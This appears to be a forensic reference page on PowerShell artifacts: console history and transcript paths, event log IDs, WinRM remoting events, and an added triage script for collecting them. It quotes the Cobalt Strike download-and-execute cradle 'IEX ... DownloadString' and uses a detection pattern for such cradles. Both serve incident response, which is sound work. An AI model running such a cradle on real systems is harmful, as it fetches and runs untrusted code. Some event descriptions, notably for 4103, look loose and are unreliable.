PowerShell

File Location:

PowerShell Console History:

The PSReadLine module is installed and enabled by default starting with PowerShell v5 on Windows 10. It records what is typed into the console, and by default it saves that history to a file.

  • C:\Users\USERNAME\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline

    • Records the last 4096 commands typed into the PowerShell console, per user account.

PowerShell Transcripts:

This policy setting lets you capture the input and output of Windows PowerShell commands into text-based transcripts.

  • C:\Users\USERNAME\Documents\YYYYMMDD\PowerShell_Transcripts.HOSTNAME.##.txt

    • Only logs activity within the console.

Parse Data

Considerations

Event Logs (classic "Windows PowerShell" log):

  • 400: Engine state is changed from None to Available.

  • 403: The engine status is changed from Available to Stopped. This event records the completion of a PowerShell activity.

  • 600: Indicates that a provider such as WSMan has started to perform a PowerShell activity on the system, for example "Provider WSMan Is Started".

  • 800: Contains pipeline execution details. Again, the HostName field reveals whether the session is local or remote, and the HostApplication field can indicate malicious PowerShell usage (for example, PowerShell executed with the -enc option).

Microsoft-Windows-PowerShell/Operational

  • 4103: Appears when your computer has execution policy restrictions, corrupted modules or insufficient permissions.

    • 4103 Module Logging is disabled by default. If enabled, it will record portions of scripts, some de-obfuscated code, and some data formatted for output.

  • 4104: Records the script block contents, but only the first time a given block is executed, in an attempt to reduce log volume.

    • 4104 can identify potentially malicious script blocks and log them automatically in the PowerShell/Operational log even when script block logging is disabled. PowerShell v5 only.

Remote Usage

Microsoft-Windows-WinRM/Operational

PowerShell remoting uses WinRM.

  • 6: WinRM connection is initialized. (Source host).

  • 91: A successful remote WinRM connection. (Destination host).

PowerShell Logging

Cobalt Strike PowerShell Imports:

The IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:22426/') component of the base64-encoded command is how Cobalt Strike manages imported PowerShell scripts within a Beacon session.

PowerShell Import Artifact:

IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:22426/')
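An added triage script, not part of the original notes, that pulls the artifacts listed above from a live Windows host: PSReadLine history per profile, transcript files, 4104 script blocks matching the download-cradle pattern of the Cobalt Strike import artifact, the classic engine/pipeline events (400/403/600/800 with their HostApplication field), and WinRM 6/91. It assumes an elevated console, the default log names, the ConsoleHost_history.txt file name and the PowerShell_transcript* file prefix (the last two are my assumptions, not strings from this page).

```powershell
# Added example: collect the PowerShell forensic artifacts described above.
# Assumes an elevated session; adjust $Days to widen the time window.
function Get-PSArtifactTriage {
    param([int]$Days = 7)
    $since = (Get-Date).AddDays(-$Days)

    # 1. PSReadLine console history for every local user profile (file name assumed)
    Get-ChildItem 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{ Artifact = 'ConsoleHistory'; User = $_.FullName.Split('\')[2]
                               Path = $_.FullName; Lines = (Get-Content $_.FullName).Count }
        }

    # 2. Transcript files (only exist when the transcription policy is enabled; prefix assumed)
    Get-ChildItem 'C:\Users\*\Documents' -Recurse -Filter 'PowerShell_transcript*.txt' -ErrorAction SilentlyContinue |
        Where-Object LastWriteTime -ge $since |
        Select-Object @{n='Artifact';e={'Transcript'}}, FullName, LastWriteTime

    # 3. Script block logging (4104): coarse match for the download cradle and -enc usage
    $pattern = 'DownloadString|Net\.WebClient|-enc(odedcommand)?\b'
    Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104; StartTime=$since} -ErrorAction SilentlyContinue |
        Where-Object { $_.Properties[2].Value -match $pattern } |   # Properties[2] = ScriptBlockText
        Select-Object TimeCreated, Id,
            @{n='ScriptBlock';e={ $t = $_.Properties[2].Value; $t.Substring(0, [Math]::Min(120, $t.Length)) }}

    # 4. Engine lifecycle and pipeline events; HostApplication shows how powershell.exe was launched
    Get-WinEvent -FilterHashtable @{LogName='Windows PowerShell'; Id=400,403,600,800; StartTime=$since} -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id,
            @{n='HostApplication';e={ (($_.Message -split "`n") -match 'HostApplication=') -replace '.*HostApplication=','' -join ' ' }}

    # 5. WinRM remoting: 6 = connection initialized (source host), 91 = session created (destination host)
    Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-WinRM/Operational'; Id=6,91; StartTime=$since} -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, @{n='Detail';e={ ($_.Message -split "`n")[0].Trim() }}
}

Get-PSArtifactTriage -Days 7 | Format-Table -AutoSize
```

Get-WinEvent returns nothing (rather than an error) for logs that have no matching events in the window, so an empty section means no events, not a missing log.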

Anti-Forensics

  • Deleting log files

Constrained Language Mode (CLM)

AppLocker
